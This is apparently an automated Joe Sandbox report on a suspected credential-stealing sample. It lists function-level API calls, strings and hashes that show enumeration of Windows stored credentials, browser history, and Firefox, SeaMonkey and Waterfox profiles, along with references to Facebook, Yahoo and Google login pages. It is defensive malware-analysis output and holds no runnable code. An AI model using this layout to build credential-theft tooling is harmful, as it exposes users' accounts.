                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                        • API String ID: 2941347001-70141382
                                        • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                        • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                        • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                        • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                        Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0040C298
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                          • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                        • wcschr.MSVCRT ref: 0040C324
                                        • wcschr.MSVCRT ref: 0040C344
                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                        • GetLastError.KERNEL32 ref: 0040C373
                                        • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                        • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                        • String ID: visited:
                                        • API String ID: 2470578098-1702587658
                                        • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                        • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                        • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                        • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                        Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                        APIs
                                          • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                        • memset.MSVCRT ref: 0040E1BD
                                          • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                        • free.MSVCRT ref: 0040E28B
                                          • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                          • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                          • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                        • _snwprintf.MSVCRT ref: 0040E257
                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                        • String ID: $ContainerId$Container_%I64d$Containers$Name
                                        • API String ID: 2804212203-2982631422
                                        • Opcode ID: 7a425c56cbbf5b1cc2378a83f6cf72cfb2264681b451cc294af70ec841fe14a3
                                        • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                        • Opcode Fuzzy Hash: 7a425c56cbbf5b1cc2378a83f6cf72cfb2264681b451cc294af70ec841fe14a3
                                        • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                        Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                        • memset.MSVCRT ref: 0040BC75
                                        • memset.MSVCRT ref: 0040BC8C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                        • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                        • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                        • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                        • String ID:
                                        • API String ID: 115830560-3916222277
                                        • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                        • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                        • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                        • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                        Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
                                        APIs
                                        • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                        • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                        • GetLastError.KERNEL32 ref: 0041847E
                                        • free.MSVCRT ref: 0041848B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateFile$ErrorLastfree
                                        • String ID: |A
                                        • API String ID: 77810686-1717621600
                                        • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                        • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                        Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0041249C
                                        • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                        • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                        • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                        • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                        • wcscpy.MSVCRT ref: 004125A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                        • String ID: r!A
                                        • API String ID: 2791114272-628097481
                                        • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                        • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                        • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                        • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                        Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                        • _wcslwr.MSVCRT ref: 0040C817
                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                        • wcslen.MSVCRT ref: 0040C82C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                        • API String ID: 2936932814-4196376884
                                        • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                        • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                        • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                        • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                        Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040A824
                                        • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • wcscpy.MSVCRT ref: 0040A854
                                        • wcscat.MSVCRT ref: 0040A86A
                                        • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                        • String ID: C:\Windows\system32
                                        • API String ID: 669240632-2896066436
                                        • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                        • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                        • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                        • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                        Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                        • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                        • wcslen.MSVCRT ref: 0040BE06
                                        • wcsncmp.MSVCRT ref: 0040BE38
                                        • memset.MSVCRT ref: 0040BE91
                                        • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                        • _wcsnicmp.MSVCRT ref: 0040BEFC
                                        • wcschr.MSVCRT ref: 0040BF24
                                        • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                        • String ID:
                                        • API String ID: 697348961-0
                                        • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                        • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                        • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                        • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                        Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00403CBF
                                        • memset.MSVCRT ref: 00403CD4
                                        • memset.MSVCRT ref: 00403CE9
                                        • memset.MSVCRT ref: 00403CFE
                                        • memset.MSVCRT ref: 00403D13
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                        • memset.MSVCRT ref: 00403DDA
                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                        • String ID: Waterfox$Waterfox\Profiles
                                        • API String ID: 4039892925-11920434
                                        • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                        • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                        • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                        • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                        Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00403E50
                                        • memset.MSVCRT ref: 00403E65
                                        • memset.MSVCRT ref: 00403E7A
                                        • memset.MSVCRT ref: 00403E8F
                                        • memset.MSVCRT ref: 00403EA4
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                        • memset.MSVCRT ref: 00403F6B
                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                        • API String ID: 4039892925-2068335096
                                        • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                        • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                        • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                        • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                        Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00403FE1
                                        • memset.MSVCRT ref: 00403FF6
                                        • memset.MSVCRT ref: 0040400B
                                        • memset.MSVCRT ref: 00404020
                                        • memset.MSVCRT ref: 00404035
                                          • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                          • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                        • memset.MSVCRT ref: 004040FC
                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                        • API String ID: 4039892925-3369679110
                                        • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                        • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                        • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                        • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                        Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
